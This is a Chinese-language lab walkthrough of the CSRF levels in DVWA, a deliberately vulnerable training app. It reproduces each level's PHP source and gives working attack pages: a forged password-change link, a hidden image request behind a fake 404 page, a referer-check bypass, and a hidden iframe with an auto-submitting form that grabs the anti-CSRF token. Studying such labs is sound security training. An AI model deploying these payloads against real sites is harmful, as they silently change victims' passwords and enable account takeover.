CSRF,全稱Cross-site request forgery,翻譯過來就是跨站請求僞造,是指利用受害者尚未失效的身份認證資訊(cookie、會話等),誘騙其點選惡意連結或者通路包含攻擊代碼的頁面,在受害人不知情的情況下以受害者的身份向(身份認證資訊所對應的)伺服器發送請求,進而完成非法操作(如轉賬、改密等)。CSRF與XSS最大的差別就在于,CSRF并沒有盜取cookie而是直接利用。在2013年釋出的新版OWASP Top 10中,CSRF排名第8。
1.先看下在low級别下的源代碼
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
2.分析如上代碼,發現在伺服器端并沒有做CSRF防禦,我們隻需要構造一個通路修改密碼的URL連結,将參數拼接後,發送給被攻擊者,引誘其點選即可,
例如:http://169.254.36.73/DVWA-master/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#
但是,這種方式太過明顯,稍微有點意識的人一眼就能識破。是以我們需要僞裝一下,構造一個html檔案,将其隐藏起來。
<img src="http://169.254.36.73/DVWA-master/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change" style="display:none;"/>
<h1>404 ERROR !<h1>
<h2>Files Not Found.<h2>
當受害者通路構造的檔案時,就會觸發CSRF攻擊,将密碼不知不覺修改掉。而受害者隻是以為點了一個錯誤頁面而已。如圖:
3.其次還可以使用短連結來隐藏URL,這是百度短網址位址:https://dwz.cn/,這裡因為沒有公共域名無法縮短帶有ip的本地位址,是以不進行示範,但是卻可以隐藏攻擊手段。
4. 再來看中級别Medium源代碼,它在low的基礎上增加了對http_referer頭的校驗,通過判斷該頭的主機位址是否來自DVWA,如果是,就認為是安全的不存在CSRF攻擊,其實這種判斷根本上是不能購防止CSRF攻擊的。因為很容以被繞過。
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
觀察上面的Referer頭,隻要包含了目标主機位址就可以繞過,是以我們可以将構造的檔案名稱起為:169.254.36.73.html
再将其部署到攻擊者的伺服器上,然後誘導受害者點選,即可。為了友善就部署在了本地tomcat上了。
上面的Referer頭就可以繞過伺服器端的referer檢查,攻擊成功繞過。
5.在看High級别代碼如下,發現服務端代碼增加了token驗證機制,看似已經可以防禦CSRF攻擊了,但是并不是無懈可擊,這種防禦機制,如果網站或系統存在XSS漏洞,可以結合xss漏洞來擷取user_token,實作攻擊。
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken();
?>
要繞過High級别的反CSRF機制,關鍵是要擷取token,要利用受害者的cookie去修改密碼的頁面擷取關鍵的token。
試着去構造一個攻擊頁面,将其放置在攻擊者的伺服器,引誘受害者通路,進而完成CSRF攻擊,下面是代碼。
<script type="text/javascript">
function attack()
{
document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
document.getElementById("transfer").submit();
}
</script>
<iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" style="display:none;">
</iframe>
<body onload="attack()">
<form method="GET" id="transfer" action="http://169.254.36.73/DVWA-master/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_conf" value="password">
<input type="hidden" name="user_token" value="">
<input type="hidden" name="Change" value="Change">
</form>
</body>
攻擊思路是當受害者點選進入這個頁面,腳本會通過一個看不見架構偷偷通路修改密碼的頁面,擷取頁面中的token,并向伺服器發送改密請求,以完成CSRF攻擊。
然而理想與現實的差距是巨大的,這裡牽扯到了跨域問題,而現在的浏覽器是不允許跨域請求的。這裡簡單解釋下跨域,我們的架構iframe通路的位址是http://169.254.36.73/DVWA-master/vulnerabilities/csrf/,位于伺服器169.254.36.73上,而我們的攻擊頁面位于黑客伺服器上,兩者的域名不同,域名B下的所有頁面都不允許主動擷取域名A下的頁面内容,除非域名A下的頁面主動發送資訊給域名B的頁面,是以我們的攻擊腳本是不可能取到改密界面中的user_token。
由于跨域是不能實作的,是以我們要将攻擊代碼注入到目标伺服器169.254.36.73中,才有可能完成攻擊。下面利用High級别的XSS漏洞協助擷取Anti-CSRF token(因為這裡的XSS注入有長度限制,不能夠注入完整的攻擊腳本,是以隻擷取Anti-CSRF token)
這裡的Name存在XSS漏洞,于是抓包,改參數,成功彈出token
這裡隻是簡單的彈出,現實攻擊中可以将token發送到攻擊者伺服器,進行構造,然後再誘導受害者通路攻擊者伺服器上的連結,進行csrf攻擊,即可成功。
6. impossible級别代碼如下
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_curr = $_GET[ 'password_current' ];
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Sanitise current password input
$pass_curr = stripslashes( $pass_curr );
$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_curr = md5( $pass_curr );
// Check that the current password is correct
$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
$data->execute();
// Do both new passwords match and does the current password match the user?
if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
// It does!
$pass_new = stripslashes( $pass_new );
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update database with new password
$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->execute();
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match or current password incorrect.</pre>";
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
CSRF總結:
Low:
接收兩個GET參數,将密碼拼接在Url後,引導使用者通路即可,無同源政策限制。引導方法:
A.發郵件、轉短連接配接隐藏位址,但是會進入修改成功的提示頁,使用者會有所察覺;
B.構造攻擊頁面,插入<img src='改密url'/>标簽, 使用者通路時,浏覽器加載圖檔時自動修改密碼。
Medium:
同上,隻是增加了HTTP_REFERER的限制,無同源限制。
在構造的連結上綴上參數即可: abc.com/test.html?hello=[SERVER_NAME~balabala]
High:
增加了Token的限制,使用session中的token進行回話驗證。
需要擷取Token後才能模拟請求,登入後才能通路該頁面擷取token,但是浏覽器有同源政策限制。
在同源政策下abc.com域名的網頁無法通路localhost的cookie,也就無法擷取到頁面的token。
需要配合xss漏洞,在xss頁面注入js實作改密操作。
Impossible:
使用Token驗證,并增加了舊密碼的驗證。
不知道舊密碼則無法修改,徹底防禦了csrf;使用token+同源政策防止了暴力重試。
參考說明:
本文參考内容作者:lonehand 參考連結: https://www.freebuf.com/articles/web/118352.html